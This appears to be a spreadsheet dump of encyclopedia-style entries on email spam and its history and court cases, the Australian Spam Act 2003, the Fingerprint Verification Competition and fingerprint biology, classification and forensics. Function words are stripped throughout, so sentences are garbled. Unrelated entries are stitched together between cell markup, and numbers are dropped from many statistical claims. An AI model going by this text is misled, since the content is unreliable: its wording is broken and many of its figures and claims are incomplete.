moved chiefly email, remains today. 1999, khan smith, well known hacker time, begun commercialize bulk email industry rallied thousands business building friendly bulk email software providing internet access illegally hacked major isps earthlink botnets.by 2009 majority spam sent around world english language; spammers began using automatic translation services send spam languages. different media email email spam, also known unsolicited bulk email (ube), junk mail, practice sending unwanted email messages, frequently commercial content, large quantities. spam email started become problem internet opened commercial mid-1990s. grew exponentially following years, 2007 constituted e-mail, conservative estimate. pressure make email spam illegal resulted legislation jurisdictions, less others. efforts taken governing bodies, security systems email service providers seem helping reduce volume email spam. according "2014 internet security threat report, volume published symantec corporation, spam volume dropped email traffic.an industry email address harvesting dedicated collecting email addresses selling compiled databases. some address-harvesting approaches rely users reading fine print agreements, resulting agreeing send messages indiscriminately contacts. this common approach social networking spam generated social networking site quechup. instant messaging instant messaging spam makes instant messaging systems. although less prevalent e-mail counterpart, according report ferris research, million spam sent 2003, twice level 2002. newsgroup forum newsgroup spam type spam targets usenet newsgroups. spamming usenet newsgroups actually pre-dates e-mail spam. usenet convention defines spamming excessive multiple posting, repeated posting message substantially similar messages). prevalence usenet spam development breidbart index objective measure message's "spamminess". forum spam creation advertising messages internet forums. generally done automated spambots. most forum spam consists links external sites, dual goals increasing search engine visibility highly competitive areas weight loss, pharmaceuticals, gambling, pornography, real estate loans, generating traffic commercial websites. some links contain code track spambot's identity; sale goes through, spammer behind spambot earns commission. mobile phone mobile phone spam directed text messaging service mobile phone. this especially irritating customers inconvenience, also charged text message received markets. comply can-spam regulations messages must provide options help stop, latter communication advertiser altogether. despite high number phone users, much phone spam, charge sending sms. recently, also observations mobile phone spam delivered browser push notifications. these result allowing websites malicious delivering malicious send user notifications. social networking spam facebook twitter immune messages containing spam links. spammers hack accounts send false links guise user's trusted contacts friends family. twitter, spammers gain credibility following verified accounts lady gaga; account owner follows spammer back, legitimizes spammer. twitter studied interest structures allow users receive interesting tweets avoid spam, despite site using broadcast model, tweets user broadcast followers user. spammers, malicious intent, post either unwanted irrelevant) information spread misinformation social media platforms. social spam spreading beyond centrally managed social networking platforms, user-generated content increasingly appears business, government, nonprofit websites worldwide. fake accounts comments planted computers programmed issue social spam infiltrate websites. blog, wiki, guestbook blog spam spamming weblogs. 2003, type spam took advantage open nature comments blogging software movable type repeatedly placing comments various blog posts provided nothing link spammer's commercial site. similar attacks often performed wikis guestbooks, accept user contributions. another possible form spam blogs spamming certain websites tumblr. spam targeting video sharing sites actual video spam, uploaded video given name description popular figure event likely draw attention, within video certain image timed come video's thumbnail image mislead viewer, still image feature film, purporting part-by-part piece movie pirated, e.g. buck bunny full movie online part 1/10 link supposed keygen, trainer, file video game, something similar. actual content video ends totally unrelated, rickroll, offensive, simply on-screen text link site promoted. cases, link question lead online survey site, password-protected archive file instructions leading aforementioned survey (though survey, archive file itself, worthless contain file question all), extreme cases, malware. others upload videos presented infomercial-like format selling product feature actors paid testimonials, though promoted product service dubious quality would likely pass scrutiny standards practices department television station cable network. voip spam voip spam voip (voice internet protocol) spam, usually using (session initiation protocol). this nearly identical telemarketing calls traditional phone lines. when user chooses receive spam call, pre-recorded spam message advertisement usually played back. this generally easier spammer voip services cheap easy anonymize internet, many options sending mass number calls single location. accounts addresses used voip spam usually identified large number outgoing calls, call completion short call length. academic search academic search engines enable researchers find academic literature used obtain citation data calculating author-level metrics. researchers university california, berkeley ovgu demonstrated (web-based) academic search engines, especially google scholar capable identifying spam attacks. researchers manipulated citation counts articles, managed make google scholar index complete fake articles, containing advertising. mobile apps spamming mobile stores include apps automatically generated result specific functionality meaningful description; (ii) multiple instances published obtain increased visibility market; (iii) apps make excessive unrelated keywords attract users unintended searches. noncommercial forms e-mail forms spamming used purposes advertisements. many early usenet spams religious political. serdar argic, instance, spammed usenet historical revisionist screeds. number evangelists spammed usenet e-mail media preaching messages. growing number criminals also using spam perpetrate various sorts fraud. geographical origins 2011 origins spam analyzed cisco systems. they provided report shows spam volume originating countries worldwide. trademark issues hormel foods corporation, maker spam luncheon meat, object internet term "spamming". however, capitalized word "spam" reserved refer product trademark. cost–benefit analyses european union's internal market commission estimated 2001 "junk email" cost internet users billion year worldwide. california legislature found spam cost united states organizations alone billion 2007, including lost productivity additional equipment, software, manpower needed combat problem. spam's direct effects include consumption computer network resources, cost human time attention dismissing unwanted messages. large companies frequent spam targets utilize numerous techniques detect prevent spam.the cost providers search engines significant: "the secondary consequence spamming search engine indexes inundated useless pages, increasing cost processed query". costs spam also include collateral costs struggle spammers administrators users media threatened spamming.email spam exemplifies tragedy commons: spammers resources (both physical human), without bearing entire cost resources. fact, spammers commonly bear cost all. this raises costs everyone. ways spam even potential threat entire email system, operated past. since email cheap send, tiny number spammers saturate internet junk mail. although tiny percentage targets motivated purchase products fall victim scams), cost provide sufficient conversion rate keep spamming alive. furthermore, even though spam appears economically viable reputable company business, suffices professional spammers convince tiny proportion gullible advertisers viable spammers stay business. finally, spammers business every day, costs allow single spammer harm finally realizing business profitable.some companies groups "rank" spammers; spammers make news sometimes referred rankings. general costs cases listed above, including commercial non-commercial, "spam happens" positive cost-benefit analysis result; cost recipients excluded externality spammer avoid paying.cost combination overhead: costs overhead electronic spamming include bandwidth, developing acquiring email/wiki/blog spam tool, taking acquiring host/zombie, etc. transaction cost: incremental cost contacting additional recipient method spamming constructed, multiplied number recipients (see captcha method increasing transaction costs). risks: chance severity legal and/or public reactions, including damages punitive damages. damage: impact community and/or communication channels spammed (see newsgroup spam).benefit total expected profit spam, include combination commercial non-commercial reasons listed above. normally linear, based incremental benefit reaching additional spam recipient, combined conversion rate. conversion rate botnet-generated spam recently measured around 12,000,000 pharmaceutical spam 200,000 infection sites used storm botnet. authors study calculating conversion rates noted, "after days, almost million e-mail messages, sales resulted." crime spam used spread computer viruses, trojan horses malicious software. objective identity theft, worse (e.g., advance fraud). some spam attempts capitalize human greed, attempts take advantage victims' inexperience computer technology trick (e.g., phishing). world's prolific spammers, robert alan soloway, arrested authorities 2007. described spammers world, soloway charged criminal counts, including mail fraud, wire fraud, e-mail fraud, aggravated identity theft, money laundering. prosecutors allege soloway used millions "zombie" computers distribute spam 2003. this first case prosecutors used identity theft laws prosecute spammer taking someone else's internet domain name.in attempt assess potential legal technical strategies stopping illegal spam, study cataloged three months online spam data researched website naming hosting infrastructures. study concluded that: half spam programs domains servers distributed eight percent fewer total available hosting registrars autonomous systems, percent spam programs overall distributed percent registrars autonomous systems; purchases researchers received transaction information, distinct banks acting credit card acquirers three banks provided payment servicing percent spam-advertised goods study; and, "financial blacklist" banking entities business spammers would dramatically reduce monetization unwanted e-mails. moreover, blacklist could updated rapidly spammers could acquire banking resources, asymmetry favoring anti-spam efforts. political issues ongoing concern expressed parties electronic frontier foundation american civil liberties union so-called "stealth blocking", term isps employing aggressive spam blocking without users' knowledge. these groups' concern isps technicians seeking reduce spam-related costs select tools (either error design) also block non-spam e-mail sites seen "spam-friendly". object existence tools; filtering mail users informed draws fire.even though possible jurisdictions treat spam unlawful merely applying existing laws trespass conversion, laws specifically targeting spam proposed. 2004, united states passed can-spam 2003 provided isps tools combat spam. this allowed yahoo! successfully eric head settled lawsuit several thousand u.s. dollars june 2004. criticized many effective enough. indeed, supported spammers organizations support spamming, opposed many anti-spam community. court cases united states earthlink million judgment notorious active "spammers" khan smith 2001 role founding modern spam industry dealt billions economic damage established thousands spammers industry. email efforts said make third internet email sent 1999 2002. sanford wallace cyber promotions target string lawsuits, many settled court, 1998 earthlink settlement cyber promotions business. attorney laurence canter disbarred tennessee supreme court 1997 sending prodigious amounts spam advertising immigration practice. 2005, jason smathers, former america online employee, pleaded guilty charges violating can-spam act. 2003, sold list approximately million subscriber e-mail addresses sean dunaway sold list spammers.in 2007, robert soloway lost case federal court operator small oklahoma-based internet service provider accused spamming. u.s. judge ralph thompson granted motion plaintiff robert braver default judgment permanent injunction him. judgment includes statutory damages award million oklahoma law.in june 2007, convicted eight counts stemming sending millions e-mail spam messages included hardcore pornographic images. jeffrey kilbride, venice, california sentenced years prison, james schaffer, paradise valley, arizona, sentenced months. addition, fined $100,000, ordered $77,500 restitution aol, ordered forfeit $1.1 million, amount illegal proceeds spamming operation. charges included conspiracy, fraud, money laundering, transportation obscene materials. trial, began june first include charges can-spam 2003, according release department justice. specific prosecutors used can-spam designed crack transmission pornography spam.in 2005, scott filary donald townsend tampa, florida sued florida attorney general charlie crist violating florida electronic mail communications act. spammers required $50,000 cover costs investigation state florida, $1.1 million penalty spamming continue, $50,000 paid, financial statements provided found inaccurate. spamming operation successfully shut down.edna fiedler, olympia, washington, june 2008, pleaded guilty tacoma court sentenced years imprisonment years supervised release probation internet million "nigerian check scam." conspired commit bank, wire mail fraud, citizens, specifically using internet accomplice shipped counterfeit checks money orders lagos, nigeria, previous november. fiedler shipped $609,000 fake check money orders arrested prepared send additional $1.1 million counterfeit materials. also, u.s. postal service recently intercepted counterfeit checks, lottery tickets ebay overpayment schemes value $2.1 billion.in 2009 opinion, gordon virtumundo, inc., f.3d 1040, ninth circuit assessed standing requirements necessary private plaintiff bring civil cause action spam senders can-spam 2003, well scope can-spam act's federal preemption clause. united kingdom first successful case kind, nigel roberts channel islands £270 media logistics sent junk e-mails personal account.in january 2007, sheriff court scotland awarded gordon dick £750 (the maximum could awarded small claim action) plus expenses £618.66, total £1368.66 transcom internet services ltd. breaching anti-spam laws. transcom legally represented earlier hearings, represented proof, gordon dick decree default. largest amount awarded compensation united kingdom since roberts media logistics case 2005. despite statutory tort created regulations implementing directive, people followed example. courts engage active case management, cases would probably expected settled mediation payment nominal damages. zealand october 2008, international internet spam operation zealand cited american authorities world's largest, time responsible third unwanted e-mails. statement federal trade commission (ftc) named christchurch's lance atkinson principals operation. zealand's internal affairs announced lodged $200,000 claim high court atkinson brother shane atkinson courier roland smits, raids christchurch. this marked first prosecution since unsolicited electronic messages (uema) passed september 2007. said received three million complaints spam messages connected operation, estimated responsible sending billions illegal spam messages. district court froze defendants’ assets preserve consumer redress pending trial. u.s. co-defendant jody smith forfeited $800,000 faces five years prison charges pleaded guilty. bulgaria while countries either outlaw least ignore spam, bulgaria first legalize according bulgarian e-commerce (чл.5,6) anyone send spam mailboxes published owned company organization long "clear straight indication message unsolicited commercial e-mail" ("да осигури ясното недвусмислено разпознаване търговското съобщение като непоискано") message body. this made lawsuits bulgarian isp's public e-mail providers antispam policy possible, obstructing legal commerce activity thus violate bulgarian antitrust acts. while lawsuits now, several cases spam obstruction currently awaiting decision bulgarian antitrust commission (комисия защита конкуренцията) serious fines isps question.the contains dubious provisions example, creation nationwide public electronic register e-mail addresses want receive spam. usually abused perfect source e-mail address harvesting, publishing invalid incorrect information register criminal offense bulgaria. newsgroups news.admin.net-abuse.email also references citations sources further reading brunton, finn. spam: shadow history internet (mit press; 2013) pages; $27.95). cultural technological history sjouwerman, stu; posluns, jeffrey, "inside spam cartel: trade secrets dark side", elsevier/syngress; edition, november 2004. isbn 978-1-932266-86-3 brown, bruce cameron "how stop e-mail spam, spyware, malware, computer viruses, hackers ruining computer" atlantic publishing group, 2011. isbn 978-1-601383-03-7 dunne, robert "computers law: introduction basic legal principles application cyberspace" cambridge university press, 2009. isbn 978-0-521886-50-5 spam archive spamdex "spam archive list spam traceable sources", 2014-15 (including 2008-2013) 35,000 spam emails listed external links december 2009: arrest major spammer anti-spam consumer resources information cybertelecom:: federal spam policy federal trade commission page spam reduction tips reporting malware city spam omelette bitdefender's weekly report spam trends techniques. reaction spam 1978 overview text first known internet e-mail spam. slamming spamming resource spam spamtrackers spamwiki: peer-reviewed spam information analysis resource. getting spam?</t>
  </si>
  <si>
    <t>Spam Act 2003</t>
  </si>
  <si>
    <t>spam 2003 (cth) passed australian parliament 2003 regulate commercial e-mail types commercial electronic messages. restricts spam, especially e-mail spam types phone spam, well e-mail address harvesting. however, broad exemptions.the first portions came effect december 2003, received royal assent, remaining sections coming force april 2004. originally enforced australian communications authority, 2005 merged australian communications media authority (acma). outline points provide that: unsolicited commercial electronic messages must sent unless designated commercial electronic message defined schedule act. commercial electronic messages must include information individual organisation authorised sending message. commercial electronic messages must contain functional unsubscribe facility. address‑harvesting software must supplied, acquired used. electronic address list produced using address‑harvesting software must supplied, acquired used. main remedies breaches civil penalties injunctions. significant cases australian communications authority clarity1 (2006) clarity1 (2006), robert nicholson, looked respondent's defence, retrospective application provisions relating acquisition harvested address lists. noted specifically lists gathered acquired prior coming force still subject legislation. also struck respondent's defence obtained consent gathered addresses defined purpose, also noted lack compliance provisions requiring provision functional unsubscribe facility. case information federal court australia (file wad155/2005) copy decision australasian legal information institute references external links dcita spam home acma spam home information spam laws federal register legislation</t>
  </si>
  <si>
    <t>Findhorn Ecovillage</t>
  </si>
  <si>
    <t>Fingerprint Verification Competition</t>
  </si>
  <si>
    <t>fingerprint verification competition (fvc) international competition fingerprint verification algorithms organized 2000 biometric system laboratory (university bologna), u.s. national biometric test center (san jose state university) pattern recognition image processing laboratory (michigan state university). after success first edition (fvc2000), three editions organized every years (fvc2002, fvc2004 fvc2006). these events received great attention academic industrial biometric communities. they established common benchmark, allowing developers unambiguously compare algorithms, provided overview state-of-the-art fingerprint recognition. after fourth edition, interest shown previous editions biometrics community prompted biometric system laboratory (university bologna) organize online evaluation campaign limited fingerprint verification algorithms: fvc-ongoing. fvc-ongoing offers web-based automatic evaluation biometric algorithms sequestered datasets, reporting results using well known performance indicators metrics. while previous initiatives organized “competitions”, specific calls fixed time frames, fvc-ongoing going competition” always open participants; evolving online repository evaluation metrics results. references maio, maltoni, cappelli, j.l. wayman a.k. jain, "fvc2000: fingerprint verification competition", ieee transactions pattern analysis machine intelligence, vol.24, no.3, pp.402-412, march 2002. maio, maltoni, cappelli, j.l. wayman a.k. jain, "fvc2002: second fingerprint verification competition", proceedings 16th international conference pattern recognition (icpr2002), québec city, vol.3, pp.811-814, august 2002. maio, maltoni, cappelli, j.l. wayman a.k. jain, "fvc2004: third fingerprint verification competition", proceedings international conference biometric authentication (icba04), hong kong, pp.1-7, july 2004. cappelli, maio maltoni, "technology evaluations fingerprint-based biometric systems", proceedings 12th european signal processing conference (eusipco2004), vienna, austria, pp.1405-1408, september 2004. maio, maltoni, cappelli, j.l. wayman a.k. jain, "technology evaluation fingerprint verification algorithms", j.l. wayman, a.k. jain, maltoni, maio, biometric systems technology, design performance evaluation, springer, 2005. cappelli, maio, maltoni, j.l. wayman a.k. jain, "performance evaluation fingerprint verification systems", ieee transactions pattern analysis machine intelligence, vol.28, no.1, pp.3-18, january 2006. cappelli, ferrara, franco maltoni, "fingerprint verification competition 2006", biometric technology today, vol.15, no.7-8, pp.7-9, august 2007. dorizzi, cappelli, ferrara, maio, maltoni, houmani, garcia-salicetti mayoue, "fingerprint on-line signature verification competitions 2009", proceedings international conference biometrics (icb), alghero, italy, pp.725-732, june 2009. external links 2000 2002 2004 2006 ongoing</t>
  </si>
  <si>
    <t>Fingerprint</t>
  </si>
  <si>
    <t>fingerprint impression left friction ridges human finger. recovery partial fingerprints crime scene important method forensic science. moisture grease finger result fingerprints surfaces glass metal. deliberate impressions entire fingerprints obtained substances transferred peaks friction ridges skin smooth surface paper. fingerprint records normally contain impressions last joint fingers thumbs, though fingerprint cards also typically record portions lower joint areas fingers. human fingerprints detailed, nearly unique, difficult alter, durable life individual, making suitable long-term markers human identity. they employed police authorities identify individuals wish conceal identity, identify people incapacitated deceased thus unable identify themselves, aftermath natural disaster. their evidence challenged academics, judges media. there uniform standards point-counting methods, academics argued error rate matching fingerprints adequately studied fingerprint evidence secure statistical foundation. research conducted whether experts objectively focus feature information fingerprints without misled extraneous information, context. biology fingerprints impressions left surfaces friction ridges finger human. matching fingerprints among widely used reliable biometric techniques. fingerprint matching considers obvious features fingerprint.a friction ridge raised portion epidermis digits (fingers toes), palm hand sole foot, consisting connected ridge units friction ridge skin. these sometimes known "epidermal ridges" caused underlying interface dermal papillae dermis interpapillary (rete) pegs epidermis. these epidermal ridges serve amplify vibrations triggered, example, fingertips brush across uneven surface, better transmitting signals sensory nerves involved fine texture perception. these ridges also assist gripping rough surfaces improve surface contact conditions. genetics consensus within scientific community suggests dermatoglyphic patterns fingertips hereditary. fingerprint patterns monozygotic twins shown similar, whereas dizygotic twins considerably less similarity. significant heritability identified dermatoglyphic characteristics. current models dermatoglyphic trait inheritance suggest mendelian transmission additional effects either additive dominant major genes.whereas genes determine general characteristics patterns type, presence environmental factors result slight differentiation fingerprint. however, relative influences genetic environmental effects fingerprint patterns generally unclear. study suggested roughly total variability small environmental effects, although performed using total ridge count metric. several models finger ridge formation mechanisms lead vast diversity fingerprints proposed. model suggests buckling instability basal cell layer fetal epidermis responsible developing epidermal ridges. additionally, blood vessels nerves also serve role formation ridge configurations. another model indicates changes amniotic fluid surrounding developing finger within uterus cause corresponding cells fingerprint grow different microenvironments. given individual, various factors affect finger differently preventing fingerprints identical still retaining similar patterns. important note determination fingerprint inheritance made difficult vast diversity phenotypes. classification specific pattern often subjective (lack consensus appropriate characteristic measure quantitatively) complicates analysis dermatoglyphic patterns. several modes inheritance suggested observed various fingerprint patterns. total fingerprint ridge count, commonly used metric fingerprint pattern size, suggested polygenic mode inheritance influenced multiple additive genes. this hypothesis challenged research, however, indicates ridge counts individual fingers genetically independent lack evidence support existence additive genes influencing pattern formation. another mode fingerprint pattern inheritance suggests arch pattern thumb fingers inherited autosomal dominant trait. further research arch pattern suggested major gene multifactorial inheritance responsible arch pattern heritability. separate model development whorl pattern indicates single gene group linked genes contributes inheritance. furthermore, inheritance whorl pattern appear symmetric pattern seemingly randomly distributed among fingers given individual. general, comparison fingerprint patterns left right hands suggests asymmetry effects genes fingerprint patterns, although observation requires analysis.in addition proposed models inheritance, specific genes implicated factors fingertip pattern formation (their exact mechanism influencing patterns still research). multivariate linkage analysis finger ridge counts individual fingers revealed linkage chromosome 5q14.1 specifically ring, index, middle fingers. mice, variants gene evi1 correlated dermatoglyphic patterns. evi1 expression humans directly influence fingerprint patterns affect limb digit formation turn play role influencing fingerprint patterns. genome-wide association studies found single nucleotide polymorphisms within gene adamts9-as2 3p14.1, appeared influence whorl pattern digits. this gene encodes antisense inhibit adamts9, expressed skin. model genetic variants adamts9-as2 directly influence whorl development proposed. classification systems before computerization, manual filing systems used large fingerprint repositories. fingerprint classification system groups fingerprints according characteristics therefore helps matching fingerprint large database fingerprints. query fingerprint needs matched therefore compared subset fingerprints existing database. early classification systems based general ridge patterns, including presence absence circular patterns, several fingers. this allowed filing retrieval paper records large collections based friction ridge patterns alone. popular systems used pattern class finger form numeric assist lookup filing system. fingerprint classification systems included roscher system, juan vucetich system henry classification system. roscher system developed germany implemented germany japan. vucetich system developed argentina implemented throughout south america. henry classification system developed india implemented english-speaking countries.in henry classification system three basic fingerprint patterns: loop, whorl, arch, constitute 60–65 percent, 30–35 percent, percent fingerprints respectively. there also complex classification systems break patterns even further, plain arches tented arches, loops radial ulnar, depending side hand toward tail points. ulnar loops start pinky-side finger, side closer ulna, lower bone. radial loops start thumb-side finger, side closer radius. whorls also sub-group classifications including plain whorls, accidental whorls, double loop whorls, peacock's eye, composite, central pocket loop whorls. system used experts, although complex, similar henry classification system. consists five fractions, stands right, left, index finger, middle finger, thumb, ring finger p(pinky) little finger. fractions follows: ri/rt rr/rm lt/rp lm/li lp/lr numbers assigned print based whether whorls. whorl first fraction given second third fourth last fraction. arches loops assigned values lastly, numbers numerator denominator added using scheme: lp)/(rt added bottom, exclude possibility division zero. example, right ring finger left index finger whorls, fraction used resulting calculation 1)/(0 fingerprint identification fingerprint identification, known dactyloscopy, hand print identification, process comparing instances friction ridge skin impressions (see minutiae), human fingers toes, even palm hand sole foot, determine whether impressions could come individual. flexibility friction ridge skin means finger palm prints ever exactly alike every detail; even impressions recorded immediately hand slightly different. fingerprint identification, also referred individualization, involves expert, expert computer system operating threshold scoring rules, determining whether friction ridge impressions likely originated finger palm sole). intentional recording friction ridges usually made black printer's rolled across contrasting white background, typically white card. friction ridges also recorded digitally, usually glass plate, using technique called live scan. "latent print" chance recording friction ridges deposited surface object wall. latent prints invisible naked eye, whereas "patent prints" "plastic prints" viewable unaided eye. latent prints often fragmentary require chemical methods, powder, alternative light sources order made clear. sometimes ordinary bright flashlight make latent print visible. when friction ridges come contact surface take print, material friction ridges perspiration, oil, grease, ink, blood, transferred surface. factors affect quality friction ridge impressions numerous. pliability skin, deposition pressure, slippage, material surface made, roughness surface, substance deposited various factors cause latent print appear differently known recording friction ridges. indeed, conditions surrounding every instance friction ridge deposition unique never duplicated. reasons, fingerprint examiners required undergo extensive training. scientific study fingerprints called dermatoglyphics. fingerprinting techniques exemplar exemplar prints, known prints, name given fingerprints deliberately collected subject, whether purposes enrollment system arrest suspected criminal offense. during criminal arrests, exemplar prints normally include print taken finger rolled edge nail other, plain slap) impressions four fingers hand, plain impressions thumb. exemplar prints collected using live scan using paper cards. latent forensic science partial fingerprint lifted surface, called latent fringerprint. moisture grease fingers result latent fingerprints surfaces glass. clearly visible, detection require chemical development powder dusting, spraying ninhydrin, iodine fuming, soaking silver nitrate. depending surface material latent fingerprint found, different methods chemical development must used. forensic scientists different techniques porous surfaces, paper, nonporous surfaces, glass, metal plastic. nonporous surfaces require dusting process, fine powder brush used, followed application transparent tape lift latent fingerprint surface.while police often describe partial fingerprints found crime scene latent prints, forensic scientists call partial fingerprints readily visible patent prints. chocolate, toner, paint fingers result patent fingerprints. latent fingerprints impressions found soft material, soap, cement plaster, called plastic prints forensic scientists. capture detection live scan devices fingerprint image acquisition considered critical step automated fingerprint authentication system, determines final fingerprint image quality, drastic effect overall system performance. there different types fingerprint readers market, basic idea behind measure physical difference ridges valleys. proposed methods grouped major families: solid-state fingerprint readers optical fingerprint readers. procedure capturing fingerprint using sensor consists rolling touching finger onto sensing area, according physical principle (optical, ultrasonic, capacitive, thermal fingerprint sensors) captures difference valleys ridges. when finger touches rolls onto surface, elastic skin deforms. quantity direction pressure applied user, skin conditions projection irregular object (the finger) onto flat plane introduce distortions, noise, inconsistencies captured fingerprint image. these problems result inconsistent non-uniform irregularities image. during acquisition, therefore, results imaging different uncontrollable. representation fingerprint changes every time finger placed sensor plate, increasing complexity attempt match fingerprints, impairing system performance consequently, limiting widespread biometric technology. order overcome problems, 2010, non-contact touchless fingerprint scanners developed. acquiring detailed information, fingerprint scanners take digital approach analog process pressing rolling finger. modelling distance neighboring points, fingerprint imaged resolution high enough record necessary detail. fingerprinting dead humans human skin itself, regenerating organ death, environmental factors lotions cosmetics, pose challenges fingerprinting human. following death human skin dries cools. obtaining fingerprints dead human, identification, hindered fact coroner medical examiner allowed examine dead body. fingerprints dead humans obtained autopsy. latent fingerprint detection 1930s criminal investigators united states first discovered existence latent fingerprints surfaces fabrics, notably insides gloves discarded perpetrators.since late nineteenth century, fingerprint identification methods used police agencies around world identify suspected criminals well victims crime. basis traditional fingerprinting technique simple. skin palmar surface hands feet forms ridges, so-called papillary ridges, patterns unique individual change time. even identical twins (who share dna) identical fingerprints. best render latent fingerprints visible, photographed, complex depend, example, type surfaces left. generally necessary "developer", usually powder chemical reagent, produce high degree visual contrast ridge patterns surface fingerprint deposited. developing agents depend presence organic materials inorganic salts effectiveness, although water deposited also take role. fingerprints typically formed aqueous-based secretions eccrine glands fingers palms additional material sebaceous glands primarily forehead. this latter contamination results common human behaviors touching face hair. resulting latent fingerprints consist usually substantial proportion water small traces amino acids chlorides mixed fatty, sebaceous component contains number fatty acids triglycerides. detection small proportion reactive organic substances urea amino acids easy. fingerprints crime scene detected simple powders, chemicals applied situ. more complex techniques, usually involving chemicals, applied specialist laboratories appropriate articles removed crime scene. with advances sophisticated techniques, advanced crime scene investigation services around world were, 2010, reporting fingerprints recovered crime scene identified result laboratory-based techniques. forensic laboratories although hundreds reported techniques fingerprint detection, many academic interest around really effective methods currently advanced fingerprint laboratories around world. some techniques, ninhydrin, diazafluorenone vacuum metal deposition, show great sensitivity used operationally. some fingerprint reagents specific, example ninhydrin diazafluorenone reacting amino acids. others ethyl cyanoacrylate polymerisation, work apparently water-based catalysis polymer growth. vacuum metal deposition using gold zinc shown non-specific, detect layers thin molecule. more mundane methods, application fine powders, work adhesion sebaceous deposits possibly aqueous deposits case fresh fingerprints. aqueous component fingerprint, whilst initially sometimes making weight fingerprint, evaporate quite quickly mostly gone hours. following work argon lasers fingerprint detection, wide range fluorescence techniques introduced, primarily enhancement chemically developed fingerprints; inherent fluorescence latent fingerprints also detected. fingerprints example visualized without chemicals infrared lasers.a comprehensive manual operational methods fingerprint enhancement last published home office scientific development branch 2013 used widely around world.a technique proposed 2007 aims identify individual's ethnicity, sex, dietary patterns. crime scene investigations application scanning kelvin probe (skp) fingerprinting technique, makes physical contact fingerprint require developers, potential allow fingerprints recorded whilst still leaving intact material could subsequently subjected analysis. forensically usable prototype development swansea university 2010, research generating significant interest british home office number different police forces across well internationally. hope instrument could eventually manufactured sufficiently large numbers widely used forensic teams worldwide. detection drug secretions, skin oils dead cells human fingerprint contain residues various chemicals metabolites present body. these detected used forensic purposes. example, fingerprints tobacco smokers contain traces cotinine, nicotine metabolite; also contain traces nicotine itself. caution used, presence caused mere contact finger tobacco product. treating fingerprint gold nanoparticles attached cotinine antibodies, subsequently fluorescent agent attached cotinine antibodies, fingerprint smoker becomes fluorescent; non-smokers' fingerprints stay dark. approach, 2010, tested identifying heavy coffee drinkers, cannabis smokers, users various drugs. police force databases most american enforcement agencies wavelet scalar quantization (wsq), wavelet-based system efficient storage compressed fingerprint images pixels inch (ppi). developed fbi, alamos national lab, national institute standards technology (nist). fingerprints recorded 1000 spatial resolution, enforcement (including fbi) uses jpeg 2000 instead wsq. validity fingerprints collected crime scene, items evidence crime, used forensic science identify suspects, victims persons touched surface. fingerprint identification emerged important system within police agencies late 19th century, replaced anthropometric measurements reliable method identifying persons prior record, often false name, criminal record repository. fingerprinting served governments worldwide past years provide identification criminals. fingerprints fundamental tool every police agency identification people criminal history.the validity forensic fingerprint evidence challenged academics, judges media. united states fingerprint examiners developed uniform standards identification individual based matching fingerprints. countries fingerprints also used criminal investigations, fingerprint examiners required match number identification points match accepted. england identification points required france match fingerprints identify individual. point-counting methods challenged fingerprint examiners focus solely location particular characteristics fingerprints matched. fingerprint examiners also uphold dissimilarity doctrine, holds dissimilarity fingerprints, fingerprints finger. furthermore, academics argued error rate matching fingerprints adequately studied. argued fingerprint evidence secure statistical foundation. research conducted whether experts objectively focus feature information fingerprints without misled extraneous information, context.fingerprints theoretically forged planted crime scenes. professional certification fingerprinting basis upon first forensic professional organization formed, international association identification (iai), 1915. first professional certification program forensic scientists established 1977, iai's certified latent print examiner program, issued certificates meeting stringent criteria power revoke certification individual's performance warranted other forensic disciplines followed suit established certification programs. history antiquity medieval period fingerprints found ancient clay tablets, seals, pottery. they also found walls egyptian tombs minoan, greek, chinese pottery. ancient china officials authenticated government documents fingerprints. fingerprints used sign written contracts babylon. fingerprints 3d-scans cuneiform tablets extracted using gigamesh software framework.with advent silk paper china, parties legal contract impressed handprints document. sometime arab merchant china, zayd hasan, witnessed chinese merchants using fingerprints authenticate loans.although ancient peoples probably realize fingerprints could uniquely identify individuals, references babylonian king hammurabi (reigned 1792–1750 bce) indicate officials would take fingerprints people arrested. during china's dynasty, records shown officials took hand prints foot prints well fingerprints evidence crime scene. chinese historian kung-yen remarked fingerprints could used means authentication. jami al-tawarikh (universal history), iranian physician rashid-al-din hamadani (1247–1318) refers chinese practice identifying people fingerprints, commenting: "experience shows individuals fingers exactly alike." europe 17th 18th centuries from late 16th century onwards, european academics attempted include fingerprints scientific studies. plausible conclusions could established mid-17th century onwards. 1686 professor anatomy university bologna marcello malpighi identified ridges, spirals loops fingerprints left surfaces. 1788 german anatomist johann christoph andreas mayer first european conclude fingerprints unique individual. 1880 henry faulds suggested, based studies, fingerprints unique human. 19th century 1823 evangelista purkyně identified nine fingerprint patterns. nine patterns include tented arch, loop, whorl, modern-day forensics considered ridge details. 1840, following murder lord william russell, provincial doctor, robert blake overton, wrote scotland yard suggesting checking fingerprints. 1853 german anatomist georg meissner (1829–1905) studied friction ridges, 1858 william james herschel initiated fingerprinting india. 1877 first instituted fingerprints contracts deeds prevent repudiation signatures hooghly near kolkata registered government pensioners' fingerprints prevent collection money relatives pensioner's death.in 1880 henry faulds, scottish surgeon tokyo hospital, published first paper usefulness fingerprints identification proposed method record printing ink. returning great britain 1886, offered concept metropolitan police london dismissed time. early 1890s police forces united states european continent could reliably identify criminals track criminal record. francis galton published detailed statistical model fingerprint analysis identification 1892 book finger prints. calculated chance "false positive" (two different individuals fingerprints) billion. 1892 juan vucetich, argentine chief police officer, created first method recording fingerprints individuals file. year, francisca rojas found house neck injuries, whilst sons found dead throats cut. rojas accused neighbour, despite brutal interrogation, neighbour would confess crimes. inspector álvarez, colleague vucetich, went scene found bloody thumb mark door. when compared rojas' prints, found identical right thumb. confessed murder sons. this first known murder case solved using fingerprint analysis.in kolkata fingerprint bureau established 1897, council governor general approved committee report fingerprints used classification criminal records. bureau employees azizul haque chandra bose credited primary development fingerprint classification system eventually named supervisor, edward richard henry. 20th century french scientist paul-jean coulier developed method transfer latent fingerprints surfaces paper using iodine fuming. allowed london scotland yard start fingerprinting individuals identify criminals using fingerprints 1901. soon after, american police departments adopted method fingerprint identification became standard practice united states. scheffer case 1902 first case identification, arrest, conviction murderer based upon fingerprint evidence. alphonse bertillon identified thief murderer scheffer, previously arrested fingerprints filed months before, fingerprints found fractured glass showcase, theft dentist's apartment dentist's employee found dead. able proved court fingerprints made showcase broken.the identification individuals fingerprints enforcement considered essential united states since beginning 20th century. body identification using fingerprints also valuable aftermath natural disasters anthropogenic hazards. united states, manages fingerprint identification system database called integrated automated fingerprint identification system (iafis), currently holds fingerprints criminal records million criminal record subjects million civil (non-criminal) fingerprint records. obim, formerly u.s. visit, holds largest 